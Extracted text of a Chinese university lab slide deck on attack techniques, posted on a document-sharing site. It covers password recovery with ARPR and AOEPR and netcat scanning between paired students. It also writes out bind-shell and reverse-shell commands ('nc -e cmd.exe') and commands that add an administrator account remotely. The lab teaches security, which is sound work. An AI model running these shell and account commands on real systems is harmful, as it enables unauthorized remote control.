实验2:攻击技术

上传人:gb****c 文档编号:243353710 上传时间:2024-09-21 格式:PPT 页数:27 大小:996KB
返回 下载 相关 举报
实验2:攻击技术_第1页
第1页 / 共27页
实验2:攻击技术_第2页
第2页 / 共27页
实验2:攻击技术_第3页
第3页 / 共27页
点击查看更多>>
资源描述
Textmasterformate durch Klicken bearbeiten,Zweite Ebene,Dritte Ebene,Vierte Ebene,Fnfte Ebene,Klicken Sie, um das Titelformat zu bearbeiten,Page,4,Textmasterformate durch Klicken bearbeiten,Zweite Ebene,Dritte Ebene,Vierte Ebene,Fnfte Ebene,Klicken Sie, um das Titelformat zu bearbeiten,Page,16,Textmasterformate durch Klicken bearbeiten,Zweite Ebene,Dritte Ebene,Vierte Ebene,Fnfte Ebene,Klicken Sie, um das Titelformat zu bearbeiten,Page,7,Textmasterformate durch Klicken bearbeiten,Zweite Ebene,Dritte Ebene,Vierte Ebene,Fnfte Ebene,Klicken Sie, um das Titelformat zu bearbeiten,Page,20,Textmasterformate durch Klicken bearbeiten,Zweite Ebene,Dritte Ebene,Vierte Ebene,Fnfte Ebene,Klicken Sie, um das Titelformat zu bearbeiten,Page,26,Textmasterformate durch Klicken bearbeiten,Zweite Ebene,Dritte Ebene,Vierte Ebene,Fnfte Ebene,Klicken Sie, um das Titelformat zu bearbeiten,Page,2,Textmasterformate durch Klicken bearbeiten,Zweite Ebene,Dritte Ebene,Vierte Ebene,Fnfte Ebene,Klicken Sie, um das Titelformat zu bearbeiten,Page,19,Textmasterformate durch Klicken bearbeiten,Zweite Ebene,Dritte Ebene,Vierte Ebene,Fnfte Ebene,Klicken Sie, um das Titelformat zu bearbeiten,Page,21,Textmasterformate durch Klicken bearbeiten,Zweite Ebene,Dritte Ebene,Vierte Ebene,Fnfte Ebene,Klicken Sie, um das Titelformat zu bearbeiten,Page,24,网络与信息安全课程实验,实验2:攻击技术,授课教师:曲海鹏,了解常见攻击技术的原理以及各自的特点和适用环境,了解本地口令的安全设置策略,掌握如何提高口令的安全性以对抗这些口令破解攻击方法,了解网络和信息传输中存在哪些威胁及漏洞,实验目的:,口令暴力破解,使用 arpr,破解压缩文件的加密口令,使用aoepr,破解outlook express的账户口令,N,et,Cat工具的使用,使用netcat进行端口扫描,使用netcat控制远程主机,使用netcat反向连接控制远程主机,实验内容主要包括:,1、,口令暴力破解,使用 arpr,破解压缩文件的加密口令,安装arpr,并启动软件,界面如下,打开待破解的文件,设置暴破的密码范围,加载test.rar,点击开始,暴力破解开始,暴破时间与密码长度和暴破策略有关,耐心等待。,暴力破解成功,结果显示如图。,此处显示密码已成功恢复,并以明文形式显示压缩文件密码,使用aoepr,破解outlook express的账户口令,安装aoepr,并启动软件,界面如下,打开Outlook,新建测试帐户,添加一个邮件帐户,用于测试密码恢复,添加一个邮件帐户,用于测试密码恢复 - 帐户显示名,添加一个邮件帐户,用于测试密码恢复 -,邮箱,添加一个邮件帐户,用于测试密码恢复 -,设置邮件服务器,添加一个邮件帐户,用于测试密码恢复 - 设置帐户和密码,添加一个邮件帐户,用于测试密码恢复,添加一个邮件帐户,用于测试密码恢复,启动Aoepr,对目标帐户进行密码破解 - 点击Mail,下图显示,测试账户密码已经被成功破解,2、,NetCat工具的使用,NetCat在网络工具中被誉为“瑞士军刀”,它可以作为类似于telnet的客户端,也可以作为服务器监听某个端口,还可以作为扫描工具扫描对方主机的端口,还可以用来传输文件。,基本用法举例:,作为客户端,连接目标主机的目标端口,nc目标主机(ip)目标端口,作为服务端监听本地端口,nc-l-p本地端口,netcat,参数,-e,prog 程序重定向,一旦连接,就执行 危险!,-i,secs 延时的间隔,-l,监听模式,用于入站连接,-n,指定数字的IP地址,不能用hostname,-o,file 记录16进制的传输,-p,port 本地端口号,-r,任意指定本地及远程端口,-s,addr 本地源地址,-u,UDP模式,-v,详细输出用两个-v可得到更详细的内容,-w,secs timeout的时间,-z,将输入输出关掉用于扫描时,使用netcat进行端口扫描,两个同学组成一组;,关闭防火墙;,分别扫描对方的开放端口:,nc,-,vv,-,z,-,w,a,被扫描IP 端口范围,(,其中a表示扫描时的时间间隔,),;,记录扫描结果,。,使用netcat进行端口扫描,举例:,主机A在命令行输入,nc -v -l -p 1027,对1027端口进行监听:,主机B 对主机A的 1024-1030端口进行扫描,记录扫描结果:,c:,nc,-,vv,-,z,-,w,1 192.168.1.8 1024-1030,使用netcat控制远程主机,两个同学组成一组;,其中一,台,主机,A,使用nc绑定cmd.exe 到a端口:,nc,-,v,-,l,-,p,a,-,e,cmd.exe,(其中,a为1024-65535,),另一主机,B,连接该主机:,nc,x.x.x.x,a,连接后,,主机B进行如下操作:,在该机D盘根目录下建立一个名为remote的文件,:,echo hello_remotehost ,文件名,查看远程用户列表,:,net user,增加一个用户test,:,net user /add test,加入管理员组,:,net localgroup /add administrators test,删除:,net user /delete test,使用netcat控制远程主机,举例,主机,A,使用nc绑定cmd.exe 到,1027,端口:,主机,B,连接主机,A,:,nc,x.x.x.x,1027,连接后,,主机B进行如下操作:,在该机D盘根目录下建立一个名为remote的文件,:,echo hello_remotehost d:,文件名,使用netcat控制远程主机,举例(续),查看远程用户列表,:,net user,增加一个用户test,:,net user /add test,加入管理员组,:,net localgroup /add administrators test,然后可以通过,net user test,查看test帐户的属性:,删除:,net user /delete test,使用netcat反向连接控制远程主机,两个同学组成一组;,其中一个主机使用nc进行监听:,nc,-,vv,-,l,-,p,a,(a,为端口号,),另一主机使用nc进行反向连接:,nc,-,e,cmd.exe,x.x.x.x,a,记录,实验,结果,。,实验报告要求,实验目的,实验步骤,实验结果,-,口令破解结果,-,通过nc可以进行的远程操作,问题:,-,如何保护outlook express 账户密码?,-,Netcat软件具有哪些主要功能?,实验2结束,
展开阅读全文
相关资源
正为您匹配相似的精品文档
相关搜索

最新文档


当前位置:首页 > 图纸专区 > 大学资料


copyright@ 2023-2025  zhuangpeitu.com 装配图网版权所有   联系电话:18123376007

备案号:ICP2024067431-1 川公网安备51140202000466号


本站为文档C2C交易模式,即用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有。装配图网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知装配图网,我们立即给予删除!